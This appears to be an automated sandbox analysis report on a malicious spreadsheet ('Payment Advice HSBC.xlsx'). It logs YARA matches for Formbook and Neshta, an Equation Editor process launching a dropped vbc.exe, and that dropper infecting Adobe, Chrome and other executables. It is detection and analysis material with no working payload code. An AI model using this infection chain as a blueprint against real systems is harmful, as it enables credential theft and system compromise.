Source: 5.0.vbc.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.19.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.13.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.19.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.17.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.13.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.15.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.469402863.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.466923037.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.468925310.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.467300347.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.468071854.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.468443002.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.467692423.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe, type: DROPPED	Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, reference = Internal Research, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354
Source: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe, type: DROPPED	Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, reference = Internal Research, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354
Source: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe, type: DROPPED	Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, reference = Internal Research, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354
Source: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe, type: DROPPED	Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, reference = Internal Research, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354

Source: C:\Users\Public\vbc.exe

File created: C:\Windows\svchost.com

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_012FA2A9	4_2_012FA2A9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E1E38	4_2_001E1E38
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E72C2	4_2_001E72C2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E55D0	4_2_001E55D0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E17B0	4_2_001E17B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_012FA035	4_2_012FA035
Source: C:\Users\Public\vbc.exe	Code function: 5_2_012FA2A9	5_2_012FA2A9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_012FA035	5_2_012FA035

Source: C:\Users\Public\vbc.exe

Window title found: unsupported 16-bit application okthe program or feature "\??\c:\users\user\appdata\local\temp\3582-490\vbc.exe" cannot start or run due to incompatibity with 64-bit versions of windows. please contact the software vendor to ask if a 64-bit windows compatible version is available.

Source: Aut2exe.exe.5.dr	Static PE information: No import functions for PE file found
Source: chrome_pwa_launcher.exe.5.dr	Static PE information: No import functions for PE file found
Source: setup.exe0.5.dr	Static PE information: No import functions for PE file found
Source: AcroTextExtractor.exe.5.dr	Static PE information: No import functions for PE file found
Source: vcredist_x64.exe.5.dr	Static PE information: No import functions for PE file found
Source: VC_redist.x86.exe.5.dr	Static PE information: No import functions for PE file found
Source: Eula.exe.5.dr	Static PE information: No import functions for PE file found
Source: setup.exe.5.dr	Static PE information: No import functions for PE file found
Source: jucheck.exe.5.dr	Static PE information: No import functions for PE file found
Source: Au3Info_x64.exe.5.dr	Static PE information: No import functions for PE file found
Source: Aut2exe_x64.exe.5.dr	Static PE information: No import functions for PE file found
Source: Au3Check.exe.5.dr	Static PE information: No import functions for PE file found
Source: 32BitMAPIBroker.exe.5.dr	Static PE information: No import functions for PE file found
Source: vcredist_x86.exe.5.dr	Static PE information: No import functions for PE file found
Source: RdrCEF.exe.5.dr	Static PE information: No import functions for PE file found
Source: chrmstp.exe.5.dr	Static PE information: No import functions for PE file found
Source: armsvc.exe.5.dr	Static PE information: No import functions for PE file found
Source: LogTransport2.exe.5.dr	Static PE information: No import functions for PE file found
Source: AutoIt3Help.exe.5.dr	Static PE information: No import functions for PE file found
Source: Uninstall.exe.5.dr	Static PE information: No import functions for PE file found
Source: jusched.exe.5.dr	Static PE information: No import functions for PE file found
Source: FullTrustNotifier.exe.5.dr	Static PE information: No import functions for PE file found
Source: AdobeCollabSync.exe.5.dr	Static PE information: No import functions for PE file found
Source: reader_sl.exe.5.dr	Static PE information: No import functions for PE file found
Source: wow_helper.exe.5.dr	Static PE information: No import functions for PE file found
Source: SciTE.exe.5.dr	Static PE information: No import functions for PE file found
Source: ADelRCP.exe.5.dr	Static PE information: No import functions for PE file found
Source: jaureg.exe.5.dr	Static PE information: No import functions for PE file found
Source: AdobeARM.exe.5.dr	Static PE information: No import functions for PE file found
Source: ose.exe.5.dr	Static PE information: No import functions for PE file found
Source: Au3Info.exe.5.dr	Static PE information: No import functions for PE file found
Source: AcroBroker.exe.5.dr	Static PE information: No import functions for PE file found
Source: Wkconv.exe.5.dr	Static PE information: No import functions for PE file found
Source: 64BitMAPIBroker.exe.5.dr	Static PE information: No import functions for PE file found
Source: upx.exe.5.dr	Static PE information: No import functions for PE file found
Source: AutoIt3_x64.exe.5.dr	Static PE information: No import functions for PE file found
Source: AdobeARMHelper.exe.5.dr	Static PE information: No import functions for PE file found
Source: elevation_service.exe.5.dr	Static PE information: No import functions for PE file found
Source: vcredist_x86.exe0.5.dr	Static PE information: No import functions for PE file found
Source: VC_redist.x64.exe.5.dr	Static PE information: No import functions for PE file found
Source: dwtrig20.exe.5.dr	Static PE information: No import functions for PE file found
Source: WCChromeNativeMessagingHost.exe.5.dr	Static PE information: No import functions for PE file found
Source: vcredist_x64.exe0.5.dr	Static PE information: No import functions for PE file found
Source: AcroRd32.exe.5.dr	Static PE information: No import functions for PE file found
Source: VSTOInstaller.exe.5.dr	Static PE information: No import functions for PE file found
Source: arh.exe.5.dr	Static PE information: No import functions for PE file found

Source: AcroTextExtractor.exe.5.dr	Static PE information: Data appended to the last section found
Source: vcredist_x64.exe.5.dr	Static PE information: Data appended to the last section found
Source: Eula.exe.5.dr	Static PE information: Data appended to the last section found
Source: Au3Info_x64.exe.5.dr	Static PE information: Data appended to the last section found
Source: Au3Check.exe.5.dr	Static PE information: Data appended to the last section found
Source: 32BitMAPIBroker.exe.5.dr	Static PE information: Data appended to the last section found
Source: vcredist_x86.exe.5.dr	Static PE information: Data appended to the last section found
Source: armsvc.exe.5.dr	Static PE information: Data appended to the last section found
Source: LogTransport2.exe.5.dr	Static PE information: Data appended to the last section found
Source: AutoIt3Help.exe.5.dr	Static PE information: Data appended to the last section found
Source: Uninstall.exe.5.dr	Static PE information: Data appended to the last section found
Source: jusched.exe.5.dr	Static PE information: Data appended to the last section found
Source: FullTrustNotifier.exe.5.dr	Static PE information: Data appended to the last section found
Source: reader_sl.exe.5.dr	Static PE information: Data appended to the last section found
Source: wow_helper.exe.5.dr	Static PE information: Data appended to the last section found
Source: ADelRCP.exe.5.dr	Static PE information: Data appended to the last section found
Source: jaureg.exe.5.dr	Static PE information: Data appended to the last section found
Source: ose.exe.5.dr	Static PE information: Data appended to the last section found
Source: Au3Info.exe.5.dr	Static PE information: Data appended to the last section found
Source: AcroBroker.exe.5.dr	Static PE information: Data appended to the last section found
Source: 64BitMAPIBroker.exe.5.dr	Static PE information: Data appended to the last section found
Source: upx.exe.5.dr	Static PE information: Data appended to the last section found
Source: AdobeARMHelper.exe.5.dr	Static PE information: Data appended to the last section found
Source: vcredist_x86.exe0.5.dr	Static PE information: Data appended to the last section found
Source: dwtrig20.exe.5.dr	Static PE information: Data appended to the last section found
Source: WCChromeNativeMessagingHost.exe.5.dr	Static PE information: Data appended to the last section found
Source: vcredist_x64.exe0.5.dr	Static PE information: Data appended to the last section found
Source: VSTOInstaller.exe.5.dr	Static PE information: Data appended to the last section found
Source: arh.exe.5.dr	Static PE information: Data appended to the last section found

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: vbc[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: VC_redist.x64.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: VC_redist.x86.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Aut2exe.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Aut2exe_x64.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: upx.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: VC_redist.x64.exe.5.dr	Static PE information: Section: .rsrc ZLIB complexity 1.00537109375
Source: VC_redist.x64.exe.5.dr	Static PE information: Section: .reloc ZLIB complexity 1.021484375
Source: VC_redist.x86.exe.5.dr	Static PE information: Section: .rsrc ZLIB complexity 1.00537109375
Source: VC_redist.x86.exe.5.dr	Static PE information: Section: .reloc ZLIB complexity 1.021484375
Source: Aut2exe.exe.5.dr	Static PE information: Section: .rsrc ZLIB complexity 1.00537109375
Source: Aut2exe.exe.5.dr	Static PE information: Section: .reloc ZLIB complexity 1.021484375
Source: Aut2exe_x64.exe.5.dr	Static PE information: Section: .rsrc ZLIB complexity 1.00537109375
Source: Aut2exe_x64.exe.5.dr	Static PE information: Section: .reloc ZLIB complexity 1.021484375

Source: Payment Advice HSBC.xlsx	Virustotal: Detection: 34%
Source: Payment Advice HSBC.xlsx	ReversingLabs: Detection: 31%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Payment Advice HSBC.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE10B.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winXLSX@7/103@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\Public\vbc.exe

Mutant created: \Sessions\1\BaseNamedObjects\mmsBFhjVBcbveI

Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: vbc[1].exe.2.dr, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc.exe.2.dr, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.vbc.exe.12f0000.1.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.12f0000.0.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E1298 push esp; retn 0013h	4_2_001E1321
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E8F9C push eax; ret	4_2_001E8F9D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004080C0 push 004080E6h; ret	5_2_004080DE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004070F4 push 00407120h; ret	5_2_00407118
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004041D8 push 00404204h; ret	5_2_004041FC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004041A0 push 004041CCh; ret	5_2_004041C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00404256 push 00404284h; ret	5_2_0040427C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00404258 push 00404284h; ret	5_2_0040427C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00404210 push 0040423Ch; ret	5_2_00404234
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004042C8 push 004042F4h; ret	5_2_004042EC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00404290 push 004042BCh; ret	5_2_004042B4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00404370 push 0040439Ch; ret	5_2_00404394
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00404300 push 0040432Ch; ret	5_2_00404324
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00404338 push 00404364h; ret	5_2_0040435C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004043E0 push 0040440Ch; ret	5_2_00404404
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004043A8 push 004043D4h; ret	5_2_004043CC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00406CE0 push 00406D36h; ret	5_2_00406D2E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00403D28 push 00403D79h; ret	5_2_00403D71
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00403F58 push 00403F84h; ret	5_2_00403F7C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00403F90 push 00403FBCh; ret	5_2_00403FB4

Source: initial sample	Static PE information: section name: .text entropy: 7.78687431178
Source: initial sample	Static PE information: section name: .text entropy: 7.78687431178
Source: initial sample	Static PE information: section name: .text entropy: 6.88560633445
Source: initial sample	Static PE information: section name: .text entropy: 7.00368298001
Source: initial sample	Static PE information: section name: .text entropy: 7.00336954384
Source: initial sample	Static PE information: section name: .text entropy: 7.4909885878
Source: initial sample	Static PE information: section name: .text entropy: 7.49148131754
Source: initial sample	Static PE information: section name: .text entropy: 6.8868280667
Source: initial sample	Static PE information: section name: .text entropy: 7.12964019221
Source: initial sample	Static PE information: section name: .text entropy: 6.95263910497
Source: initial sample	Static PE information: section name: .text entropy: 7.34326857021
Source: initial sample	Static PE information: section name: .text entropy: 7.17347995787
Source: initial sample	Static PE information: section name: .text entropy: 7.84217762577

Persistence and Installation Behavior:

Yara detected Neshta

Show sources

Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Infects executable files (exe, dll, sys, html)

Show sources

Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\setup.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Package Cache\{e2803110-78b3-4664-a479-3611a381656a}\VC_redist.x86.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\elevation_service.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\updater.exe	Jump to behavior
